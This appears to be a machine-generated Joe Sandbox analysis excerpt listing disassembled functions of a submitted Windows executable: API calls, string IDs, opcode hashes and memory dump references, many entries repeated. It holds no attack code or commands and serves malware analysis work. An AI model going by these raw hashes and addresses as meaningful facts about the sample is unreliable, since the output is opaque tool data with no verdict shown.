                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: da4aca856d7db8d72ac8d789eeb25ac1d7d6190c4df67b27b1876416801f3dca
                • Instruction ID: 6b992a00460de8c6d1f15712e688f6f0d702babe8c412b2487825f3781060b5d
                • Opcode Fuzzy Hash: da4aca856d7db8d72ac8d789eeb25ac1d7d6190c4df67b27b1876416801f3dca
                • Instruction Fuzzy Hash: 6CA011AA2BCA82BC320CB203BC02C3E020CC0C0B203308A2AF00A8008AAA800C0A0832
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 10ef172acac0b06aecc9ed696bdd53440f3f92d68144b8af5b25a41afc59eb3b
                • Instruction ID: 732598d837e3528b9c45e0709fc5b729587547f455efd783643603fc333263f2
                • Opcode Fuzzy Hash: 10ef172acac0b06aecc9ed696bdd53440f3f92d68144b8af5b25a41afc59eb3b
                • Instruction Fuzzy Hash: F0A0129527C5427C310C51027C07D3E021CC0C5B103714409F006900C16B400C050030
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 27fcec2489f3726cdf03d47fbe0cfd856182a762a928b0e2f556782277c13512
                • Instruction ID: 732598d837e3528b9c45e0709fc5b729587547f455efd783643603fc333263f2
                • Opcode Fuzzy Hash: 27fcec2489f3726cdf03d47fbe0cfd856182a762a928b0e2f556782277c13512
                • Instruction Fuzzy Hash: F0A0129527C5427C310C51027C07D3E021CC0C5B103714409F006900C16B400C050030
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 8500adc0e399c69142e68badcf190874c6ccc7f5cc3003ff84ce747ad9572eac
                • Instruction ID: 732598d837e3528b9c45e0709fc5b729587547f455efd783643603fc333263f2
                • Opcode Fuzzy Hash: 8500adc0e399c69142e68badcf190874c6ccc7f5cc3003ff84ce747ad9572eac
                • Instruction Fuzzy Hash: F0A0129527C5427C310C51027C07D3E021CC0C5B103714409F006900C16B400C050030
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDBD5
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: 93d9e2a1c7acbbcf3355406500eb146a89e009cd25735b7615a4c4c2dd6a884f
                • Instruction ID: 732598d837e3528b9c45e0709fc5b729587547f455efd783643603fc333263f2
                • Opcode Fuzzy Hash: 93d9e2a1c7acbbcf3355406500eb146a89e009cd25735b7615a4c4c2dd6a884f
                • Instruction Fuzzy Hash: F0A0129527C5427C310C51027C07D3E021CC0C5B103714409F006900C16B400C050030
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDC36
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: e9fae8bf35d07a9046448717f2445ca71c4c667632c7080114312d57a119f040
                • Instruction ID: ac2682be5eb3fe74dc147f184e18e3a024b79a4eba6fea9f02e592f56a0548e2
                • Opcode Fuzzy Hash: e9fae8bf35d07a9046448717f2445ca71c4c667632c7080114312d57a119f040
                • Instruction Fuzzy Hash: 80A0129517CA427C310C61127C02C3E021CC0C0F90370480DB00A900C257801C054030
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EDC36
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID:
                • API String ID: 1269201914-0
                • Opcode ID: a1e33b7a52d44412c867b00c481b876cf90fbc034d05d2cec779bb4b57481ce9
                • Instruction ID: ac2682be5eb3fe74dc147f184e18e3a024b79a4eba6fea9f02e592f56a0548e2
                • Opcode Fuzzy Hash: a1e33b7a52d44412c867b00c481b876cf90fbc034d05d2cec779bb4b57481ce9
                • Instruction Fuzzy Hash: 80A0129517CA427C310C61127C02C3E021CC0C0F90370480DB00A900C257801C054030
                APIs
                • SetCurrentDirectoryW.KERNELBASE(?,001EA587,C:\Users\user\Desktop,00000000,0021946A,00000006), ref: 001EA326
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CurrentDirectory
                • String ID:
                • API String ID: 1611563598-0
                • Opcode ID: 4c8da97724495a8979b042b3c2c2737a6e9ab5daee9955abd59721d6bb5c8e11
                • Instruction ID: b6229ee00fac0dbac528519583827484ab2d151d9124ff4ba62a9af2a935ff75
                • Opcode Fuzzy Hash: 4c8da97724495a8979b042b3c2c2737a6e9ab5daee9955abd59721d6bb5c8e11
                • Instruction Fuzzy Hash: 24A0123019410656CE004B30DC0DC15B6545760702F0086207006C00A0CB308814A500
                APIs
                • CloseHandle.KERNELBASE(000000FF,?,?,001D968F,?,?,?,?,00201FA1,000000FF), ref: 001D96EB
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CloseHandle
                • String ID:
                • API String ID: 2962429428-0
                • Opcode ID: 683615d73347cdc15a7c3796a8c142495ea31de1ea49d5bc08de81410912c48c
                • Instruction ID: 83458758a77ef32147c95ee8d3087185790e5f500c3dda9ce5dcf5d8c86c8dd7
                • Opcode Fuzzy Hash: 683615d73347cdc15a7c3796a8c142495ea31de1ea49d5bc08de81410912c48c
                • Instruction Fuzzy Hash: 7BF08271556B048FDB308E24D589792B7E89B12735F049B1FD0F753AE0D761A88D8F00
                APIs
                  • Part of subcall function 001D130B: GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                  • Part of subcall function 001D130B: SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 001EB971
                • EndDialog.USER32(?,00000006), ref: 001EB984
                • GetDlgItem.USER32(?,0000006C), ref: 001EB9A0
                • SetFocus.USER32(00000000), ref: 001EB9A7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 001EB9E1
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001EBA18
                • FindFirstFileW.KERNEL32(?,?), ref: 001EBA2E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 001EBA4C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001EBA5C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001EBA78
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001EBA94
                • _swprintf.LIBCMT ref: 001EBAC4
                  • Part of subcall function 001D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D401D
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 001EBAD7
                • FindClose.KERNEL32(00000000), ref: 001EBADE
                • _swprintf.LIBCMT ref: 001EBB37
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 001EBB4A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 001EBB67
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 001EBB87
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001EBB97
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 001EBBB1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 001EBBC9
                • _swprintf.LIBCMT ref: 001EBBF5
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 001EBC08
                • _swprintf.LIBCMT ref: 001EBC5C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 001EBC6F
                  • Part of subcall function 001EA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001EA662
                  • Part of subcall function 001EA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0020E600,?,?), ref: 001EA6B1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                • API String ID: 797121971-1840816070
                • Opcode ID: 9b36f98d991233b7ed18fd95e2b0d010202771a301734043c82c09f453b7e872
                • Instruction ID: 5f8edc579a19fa511d7848d65bebabee15861bf7f1f756762c89fa3d3322e2e8
                • Opcode Fuzzy Hash: 9b36f98d991233b7ed18fd95e2b0d010202771a301734043c82c09f453b7e872
                • Instruction Fuzzy Hash: 7B9184B2248388BBD721DBA1DD8DFFFB7ACEB49704F044819B749D2192D77196088762
                APIs
                • __EH_prolog.LIBCMT ref: 001D7191
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001D72F1
                • CloseHandle.KERNEL32(00000000), ref: 001D7301
                  • Part of subcall function 001D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 001D7C04
                  • Part of subcall function 001D7BF5: GetLastError.KERNEL32 ref: 001D7C4A
                  • Part of subcall function 001D7BF5: CloseHandle.KERNEL32(?), ref: 001D7C59
                • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 001D730C
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001D741A
                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 001D7446
                • CloseHandle.KERNEL32(?), ref: 001D7457
                • GetLastError.KERNEL32 ref: 001D7467
                • RemoveDirectoryW.KERNEL32(?), ref: 001D74B3
                • DeleteFileW.KERNEL32(?), ref: 001D74DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 3935142422-3508440684
                • Opcode ID: d4b23b4728d15c0d9b43a036db42ac345d92d26d51456418375d9abc156c9e59
                • Instruction ID: 6cb1ec8d9fa601a9d339d3d2d154e7ec839da648e2ef2ca95a0116efdb811575
                • Opcode Fuzzy Hash: d4b23b4728d15c0d9b43a036db42ac345d92d26d51456418375d9abc156c9e59
                • Instruction Fuzzy Hash: 1EB10471904219ABDF21DF64DC45BFEB7B8BF14300F04456AF949E7282E734AA49CB61
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog_memcmp
                • String ID: CMT$h%u$hc%u
                • API String ID: 3004599000-3282847064
                • Opcode ID: 51cb4efa50896b99d461c7d463f30ffaa5479ff9652ae22fab0f33f111d18313
                • Instruction ID: c3f274c892499aa14ab957a6e95f1c6f7b402b316e1aa6ba8414f801893c289b
                • Opcode Fuzzy Hash: 51cb4efa50896b99d461c7d463f30ffaa5479ff9652ae22fab0f33f111d18313
                • Instruction Fuzzy Hash: 0F32B171610285AFDF14DF64C895AEA37A5AF24300F04457FFD9ACB382DB74AA48CB61
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: __floor_pentium4
                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                • API String ID: 4168288129-2761157908
                • Opcode ID: 71edeb5c57d40568cfeeb7fa5966ca8a7611e36a85feb8c3920dd29a6e144c3c
                • Instruction ID: 37188bbe738ad4cb6f96314bfe8e7c73afc65d4188257593ff1e6625803e9c20
                • Opcode Fuzzy Hash: 71edeb5c57d40568cfeeb7fa5966ca8a7611e36a85feb8c3920dd29a6e144c3c
                • Instruction Fuzzy Hash: 07C23A71E0862C8FDB29CE28AD447F9B7B6EB85314F1541EAD90DE7240E775AE818F40
                APIs
                • __EH_prolog.LIBCMT ref: 001D27F1
                • _strlen.LIBCMT ref: 001D2D7F
                  • Part of subcall function 001E137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,001DB652,00000000,?,?,?,0001043C), ref: 001E1396
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001D2EE0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                • String ID: CMT
                • API String ID: 1706572503-2756464174
                • Opcode ID: 219c2818093c795106f7144f259d761760eed1ad5185b229fdcefff103d3ad1d
                • Instruction ID: 71e6e41a3e873f016682160fa127c6d96807d88e84e057c520e62adb01a490d4
                • Opcode Fuzzy Hash: 219c2818093c795106f7144f259d761760eed1ad5185b229fdcefff103d3ad1d
                • Instruction Fuzzy Hash: D562F3716006448FDF19DF78C8956EA3BE1AF65304F09457FECAA8B382DB70A945CB60
                APIs
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 001F8767
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 001F8771
                • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 001F877E
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                • String ID:
                • API String ID: 3906539128-0
                • Opcode ID: a72818938c000e3871ffd92131705247933c52475060739e520be6dd0b60d700
                • Instruction ID: 2331b4eeccf773e331caf6f7d4296d17944ecb84440e08b65a9b6c261e607fe4
                • Opcode Fuzzy Hash: a72818938c000e3871ffd92131705247933c52475060739e520be6dd0b60d700
                • Instruction Fuzzy Hash: 8631B57590122C9BCB21DF65D889B9DB7B8BF58310F5041EAF90CA7251EB309B858F45
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction ID: baa96ebe5c46086758f5915072d12aff00ea75564ed499651ea4a65c7e58c81e
                • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                • Instruction Fuzzy Hash: 9D022C71E0021D9BDF14CFA9C9906AEFBF2EF88314F25416AE919E7385D731A941DB80
                APIs
                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001EA662
                • GetNumberFormatW.KERNEL32(00000400,00000000,?,0020E600,?,?), ref: 001EA6B1
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
